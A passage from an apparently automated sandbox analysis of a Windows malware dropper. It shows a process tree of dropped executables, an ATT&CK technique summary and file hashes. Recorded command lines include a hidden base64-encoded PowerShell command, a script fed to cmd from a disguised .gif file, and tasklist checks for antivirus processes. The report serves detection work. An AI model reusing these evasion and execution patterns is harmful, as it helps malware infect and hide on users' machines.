                                                                      PID:2252
                                                                  • C:\Users\Admin\Documents\wzEcaa0t5acRYskOYy0GFsM_.exe
                                                                    "C:\Users\Admin\Documents\wzEcaa0t5acRYskOYy0GFsM_.exe"
                                                                    5⤵
                                                                    • Executes dropped EXE
                                                                    • Checks computer location settings
                                                                    PID:2376
                                                                  • C:\Users\Admin\Documents\FFSxpFAS_M_fVVKCo9cbF9EE.exe
                                                                    "C:\Users\Admin\Documents\FFSxpFAS_M_fVVKCo9cbF9EE.exe"
                                                                    5⤵
                                                                    • Executes dropped EXE
                                                                    • Checks BIOS information in registry
                                                                    • Checks whether UAC is enabled
                                                                    • Suspicious use of SetThreadContext
                                                                    PID:2936
                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                      6⤵
                                                                        PID:5116
                                                                    • C:\Users\Admin\Documents\ZMliBc0vsxphfXfoK1keLgpC.exe
                                                                      "C:\Users\Admin\Documents\ZMliBc0vsxphfXfoK1keLgpC.exe"
                                                                      5⤵
                                                                      • Executes dropped EXE
                                                                      • Checks BIOS information in registry
                                                                      • Checks whether UAC is enabled
                                                                      • Suspicious use of SetThreadContext
                                                                      PID:3876
                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                        6⤵
                                                                          PID:4492
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c sonia_4.exe
                                                                    3⤵
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:228
                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4D37DEFD\sonia_4.exe
                                                                      sonia_4.exe
                                                                      4⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:4088
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c sonia_3.exe
                                                                    3⤵
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:224
                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4D37DEFD\sonia_3.exe
                                                                      sonia_3.exe
                                                                      4⤵
                                                                      • Executes dropped EXE
                                                                      • Modifies system certificate store
                                                                      PID:4184
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4184 -s 1168
                                                                        5⤵
                                                                        • Program crash
                                                                        PID:2144
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c sonia_2.exe
                                                                    3⤵
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:212
                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4D37DEFD\sonia_2.exe
                                                                      sonia_2.exe
                                                                      4⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      • Checks SCSI registry key(s)
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious behavior: MapViewOfSection
                                                                      PID:1836
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2884 -s 544
                                                                    3⤵
                                                                    • Program crash
                                                                    PID:2492
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2884 -ip 2884
                                                                1⤵
                                                                  PID:2300
                                                                • C:\Windows\system32\rUNdlL32.eXe
                                                                  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                  1⤵
                                                                  • Process spawned unexpected child process
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:4164
                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                    2⤵
                                                                    • Loads dropped DLL
                                                                    PID:3180
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3180 -s 600
                                                                      3⤵
                                                                      • Program crash
                                                                      PID:2424
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3180 -ip 3180
                                                                  1⤵
                                                                    PID:2180
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4184 -ip 4184
                                                                    1⤵
                                                                      PID:4368
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
                                                                      1⤵
                                                                        PID:1000
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          cmd
                                                                          2⤵
                                                                            PID:2080
                                                                            • C:\Windows\SysWOW64\tasklist.exe
                                                                              tasklist /FI "imagename eq BullGuardCore.exe"
                                                                              3⤵
                                                                              • Enumerates processes with tasklist
                                                                              PID:400
                                                                            • C:\Windows\SysWOW64\find.exe
                                                                              find /I /N "bullguardcore.exe"
                                                                              3⤵
                                                                                PID:2956
                                                                              • C:\Windows\SysWOW64\tasklist.exe
                                                                                tasklist /FI "imagename eq PSUAService.exe"
                                                                                3⤵
                                                                                • Enumerates processes with tasklist
                                                                                PID:1984
                                                                              • C:\Windows\SysWOW64\find.exe
                                                                                find /I /N "psuaservice.exe"
                                                                                3⤵
                                                                                  PID:4484
                                                                                • C:\Windows\SysWOW64\findstr.exe
                                                                                  findstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif
                                                                                  3⤵
                                                                                    PID:1988
                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
                                                                                    Accostarmi.exe.pif N
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                    • Suspicious use of SendNotifyMessage
                                                                                    PID:1948
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 4836 -ip 4836
                                                                                1⤵
                                                                                  PID:2116
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4532 -ip 4532
                                                                                  1⤵
                                                                                    PID:1664
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4532 -ip 4532
                                                                                    1⤵
                                                                                      PID:1752
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4836 -ip 4836
                                                                                      1⤵
                                                                                        PID:3716
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1664 -ip 1664
                                                                                        1⤵
                                                                                          PID:1108
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1272 -ip 1272
                                                                                          1⤵
                                                                                            PID:5072
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4836 -ip 4836
                                                                                            1⤵
                                                                                              PID:4724
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2412 -ip 2412
                                                                                              1⤵
                                                                                                PID:8
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4836 -ip 4836
                                                                                                1⤵
                                                                                                  PID:4220
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 396 -ip 396
                                                                                                  1⤵
                                                                                                    PID:1288
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4836 -ip 4836
                                                                                                    1⤵
                                                                                                      PID:8
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4836 -ip 4836
                                                                                                      1⤵
                                                                                                        PID:2744
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4836 -ip 4836
                                                                                                        1⤵
                                                                                                          PID:4720
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4996 -ip 4996
                                                                                                          1⤵
                                                                                                            PID:2144
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4836 -ip 4836
                                                                                                            1⤵
                                                                                                              PID:4832
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 4836 -ip 4836
                                                                                                              1⤵
                                                                                                                PID:3488
                                                                                                              • C:\Windows\SysWOW64\iqzmzqsb\pupomqih.exe
                                                                                                                C:\Windows\SysWOW64\iqzmzqsb\pupomqih.exe /d"C:\Users\Admin\cplnkopw.exe"
                                                                                                                1⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                PID:2032
                                                                                                                • C:\Windows\SysWOW64\svchost.exe
                                                                                                                  svchost.exe
                                                                                                                  2⤵
                                                                                                                    PID:824
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 536
                                                                                                                    2⤵
                                                                                                                    • Program crash
                                                                                                                    PID:864
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 1272 -ip 1272
                                                                                                                  1⤵
                                                                                                                    PID:3884
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 2032 -ip 2032
                                                                                                                    1⤵
                                                                                                                      PID:5044
                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                      1⤵
                                                                                                                        PID:1520
                                                                                                                        • C:\Windows\system32\gpupdate.exe
                                                                                                                          "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                          2⤵
                                                                                                                            PID:1000
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1272 -ip 1272
                                                                                                                          1⤵
                                                                                                                            PID:2212
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 1272 -ip 1272
                                                                                                                            1⤵
                                                                                                                              PID:3176
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 1272 -ip 1272
                                                                                                                              1⤵
                                                                                                                                PID:2552
                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 1272 -ip 1272
                                                                                                                                1⤵
                                                                                                                                  PID:5020
                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                  1⤵
                                                                                                                                    PID:3708
                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                    1⤵
                                                                                                                                      PID:3176
                                                                                                                                    • C:\Windows\system32\gpscript.exe
                                                                                                                                      gpscript.exe /RefreshSystemParam
                                                                                                                                      1⤵
                                                                                                                                        PID:3084

                                                                                                                                      Network

                                                                                                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                      Execution

                                                                                                                                      Scheduled Task

                                                                                                                                      1
                                                                                                                                      T1053

                                                                                                                                      Persistence

                                                                                                                                      Modify Existing Service

                                                                                                                                      2
                                                                                                                                      T1031

                                                                                                                                      New Service

                                                                                                                                      1
                                                                                                                                      T1050

                                                                                                                                      Registry Run Keys / Startup Folder

                                                                                                                                      1
                                                                                                                                      T1060

                                                                                                                                      Scheduled Task

                                                                                                                                      1
                                                                                                                                      T1053

                                                                                                                                      Privilege Escalation

                                                                                                                                      New Service

                                                                                                                                      1
                                                                                                                                      T1050

                                                                                                                                      Scheduled Task

                                                                                                                                      1
                                                                                                                                      T1053

                                                                                                                                      Defense Evasion

                                                                                                                                      Modify Registry

                                                                                                                                      3
                                                                                                                                      T1112

                                                                                                                                      Disabling Security Tools

                                                                                                                                      1
                                                                                                                                      T1089

                                                                                                                                      Virtualization/Sandbox Evasion

                                                                                                                                      1
                                                                                                                                      T1497

                                                                                                                                      Install Root Certificate

                                                                                                                                      1
                                                                                                                                      T1130

                                                                                                                                      Credential Access

                                                                                                                                      Credentials in Files

                                                                                                                                      4
                                                                                                                                      T1081

                                                                                                                                      Discovery

                                                                                                                                      Query Registry

                                                                                                                                      7
                                                                                                                                      T1012

                                                                                                                                      Virtualization/Sandbox Evasion

                                                                                                                                      1
                                                                                                                                      T1497

                                                                                                                                      System Information Discovery

                                                                                                                                      7
                                                                                                                                      T1082

                                                                                                                                      Peripheral Device Discovery

                                                                                                                                      1
                                                                                                                                      T1120

                                                                                                                                      Process Discovery

                                                                                                                                      1
                                                                                                                                      T1057

                                                                                                                                      Collection

                                                                                                                                      Data from Local System

                                                                                                                                      4
                                                                                                                                      T1005

                                                                                                                                      Command and Control

                                                                                                                                      Web Service

                                                                                                                                      1
                                                                                                                                      T1102

                                                                                                                                      Replay Monitor

                                                                                                                                      Loading Replay Monitor...

                                                                                                                                      Downloads

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4D37DEFD\libcurl.dll
                                                                                                                                        MD5

                                                                                                                                        d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                        SHA1

                                                                                                                                        028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                        SHA256

                                                                                                                                        0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                        SHA512

                                                                                                                                        857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4D37DEFD\libcurl.dll
                                                                                                                                        MD5

                                                                                                                                        d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                        SHA1

                                                                                                                                        028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                        SHA256

                                                                                                                                        0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                        SHA512

                                                                                                                                        857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4D37DEFD\libcurlpp.dll
                                                                                                                                        MD5

                                                                                                                                        e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                        SHA1

                                                                                                                                        b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                        SHA256

                                                                                                                                        43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                        SHA512

                                                                                                                                        9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4D37DEFD\libcurlpp.dll
                                                                                                                                        MD5

                                                                                                                                        e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                        SHA1

                                                                                                                                        b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                        SHA256

                                                                                                                                        43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                        SHA512

                                                                                                                                        9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4D37DEFD\libgcc_s_dw2-1.dll
                                                                                                                                        MD5

                                                                                                                                        9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                        SHA1

                                                                                                                                        64264300801a353db324d11738ffed876550e1d3

                                                                                                                                        SHA256

                                                                                                                                        59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                        SHA512

                                                                                                                                        0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4D37DEFD\libgcc_s_dw2-1.dll
                                                                                                                                        MD5

                                                                                                                                        9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                        SHA1

                                                                                                                                        64264300801a353db324d11738ffed876550e1d3

                                                                                                                                        SHA256

                                                                                                                                        59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                        SHA512

                                                                                                                                        0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4D37DEFD\libstdc++-6.dll
                                                                                                                                        MD5

                                                                                                                                        5e279950775baae5fea04d2cc4526bcc

                                                                                                                                        SHA1

                                                                                                                                        8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                        SHA256

                                                                                                                                        97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                        SHA512

                                                                                                                                        666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4D37DEFD\libstdc++-6.dll
                                                                                                                                        MD5

                                                                                                                                        5e279950775baae5fea04d2cc4526bcc

                                                                                                                                        SHA1

                                                                                                                                        8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                        SHA256

                                                                                                                                        97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                        SHA512

                                                                                                                                        666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4D37DEFD\libwinpthread-1.dll
                                                                                                                                        MD5

                                                                                                                                        1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                        SHA1

                                                                                                                                        fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                        SHA256

                                                                                                                                        509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                        SHA512

                                                                                                                                        3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4D37DEFD\libwinpthread-1.dll
                                                                                                                                        MD5

                                                                                                                                        1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                        SHA1

                                                                                                                                        fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                        SHA256

                                                                                                                                        509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                        SHA512

                                                                                                                                        3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4D37DEFD\setup_install.exe
                                                                                                                                        MD5

                                                                                                                                        effcd1d089a6dc45660fc83de2a036e2

                                                                                                                                        SHA1

                                                                                                                                        367603ad8a3395e98a2a5162630f57d39e9eddf1

                                                                                                                                        SHA256

                                                                                                                                        dd75192fddb0acbffeecbe0e397c10bb808dec88352d990400227884ef731db8

                                                                                                                                        SHA512

                                                                                                                                        0403a590b793fa0f65aa90d2ddcc46c7ebeaec81bf29bfa1b086cd68e40bab90f0f871527744da84658734eb4d735f137cfbcb64b12d18b97ae765146350b25f

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4D37DEFD\setup_install.exe
                                                                                                                                        MD5

                                                                                                                                        effcd1d089a6dc45660fc83de2a036e2

                                                                                                                                        SHA1

                                                                                                                                        367603ad8a3395e98a2a5162630f57d39e9eddf1

                                                                                                                                        SHA256

                                                                                                                                        dd75192fddb0acbffeecbe0e397c10bb808dec88352d990400227884ef731db8

                                                                                                                                        SHA512

                                                                                                                                        0403a590b793fa0f65aa90d2ddcc46c7ebeaec81bf29bfa1b086cd68e40bab90f0f871527744da84658734eb4d735f137cfbcb64b12d18b97ae765146350b25f

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4D37DEFD\sonia_1.exe
                                                                                                                                        MD5

                                                                                                                                        6e43430011784cff369ea5a5ae4b000f

                                                                                                                                        SHA1

                                                                                                                                        5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                        SHA256

                                                                                                                                        a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                        SHA512

                                                                                                                                        33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4D37DEFD\sonia_1.exe
                                                                                                                                        MD5

                                                                                                                                        6e43430011784cff369ea5a5ae4b000f

                                                                                                                                        SHA1

                                                                                                                                        5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                        SHA256

                                                                                                                                        a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                        SHA512

                                                                                                                                        33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4D37DEFD\sonia_1.txt
                                                                                                                                        MD5

                                                                                                                                        6e43430011784cff369ea5a5ae4b000f

                                                                                                                                        SHA1

                                                                                                                                        5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                        SHA256

                                                                                                                                        a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                        SHA512

                                                                                                                                        33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4D37DEFD\sonia_2.exe
                                                                                                                                        MD5

                                                                                                                                        598e9d45522cdf1e3f35740170e9922b

                                                                                                                                        SHA1

                                                                                                                                        056cffe0507d27bac4789674729b4c2ae548afcb

                                                                                                                                        SHA256

                                                                                                                                        41b25eac5234d09d70dbcd3830a098c1b25828cfb70990e2938ebf99d31f796f

                                                                                                                                        SHA512

                                                                                                                                        ce8b3979412fb8307af2c407f10fc0e386772627ae3672f8c9be012f28caa6557769e43a26421ecc5b4c1a7d831c514388ebff0401d8a06be976fbbc55e52fcc

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4D37DEFD\sonia_2.txt
                                                                                                                                        MD5

                                                                                                                                        598e9d45522cdf1e3f35740170e9922b

                                                                                                                                        SHA1

                                                                                                                                        056cffe0507d27bac4789674729b4c2ae548afcb

                                                                                                                                        SHA256

                                                                                                                                        41b25eac5234d09d70dbcd3830a098c1b25828cfb70990e2938ebf99d31f796f

                                                                                                                                        SHA512

                                                                                                                                        ce8b3979412fb8307af2c407f10fc0e386772627ae3672f8c9be012f28caa6557769e43a26421ecc5b4c1a7d831c514388ebff0401d8a06be976fbbc55e52fcc

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4D37DEFD\sonia_3.exe
                                                                                                                                        MD5

                                                                                                                                        ee658be7ea7269085f4004d68960e547

                                                                                                                                        SHA1

                                                                                                                                        979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                        SHA256

                                                                                                                                        d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                        SHA512

                                                                                                                                        fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4D37DEFD\sonia_3.txt
                                                                                                                                        MD5

                                                                                                                                        ee658be7ea7269085f4004d68960e547

                                                                                                                                        SHA1

                                                                                                                                        979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                        SHA256

                                                                                                                                        d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                        SHA512

                                                                                                                                        fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4D37DEFD\sonia_4.exe
                                                                                                                                        MD5

                                                                                                                                        6765fe4e4be8c4daf3763706a58f42d0

                                                                                                                                        SHA1

                                                                                                                                        cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                                                                        SHA256

                                                                                                                                        755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                                                                        SHA512

                                                                                                                                        c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4D37DEFD\sonia_4.txt
                                                                                                                                        MD5

                                                                                                                                        6765fe4e4be8c4daf3763706a58f42d0

                                                                                                                                        SHA1

                                                                                                                                        cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                                                                        SHA256

                                                                                                                                        755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                                                                        SHA512

                                                                                                                                        c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4D37DEFD\sonia_5.exe
                                                                                                                                        MD5

                                                                                                                                        0c3f670f496ffcf516fe77d2a161a6ee

                                                                                                                                        SHA1

                                                                                                                                        0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                                                                                        SHA256

                                                                                                                                        8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                                                                                        SHA512

                                                                                                                                        bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4D37DEFD\sonia_5.txt
                                                                                                                                        MD5

                                                                                                                                        0c3f670f496ffcf516fe77d2a161a6ee

                                                                                                                                        SHA1

                                                                                                                                        0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                                                                                        SHA256

                                                                                                                                        8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                                                                                        SHA512

                                                                                                                                        bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4D37DEFD\sonia_6.exe
                                                                                                                                        MD5

                                                                                                                                        2eb68e495e4eb18c86a443b2754bbab2

                                                                                                                                        SHA1

                                                                                                                                        82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                                                                                                        SHA256

                                                                                                                                        a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                                                                                                        SHA512

                                                                                                                                        f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4D37DEFD\sonia_6.txt
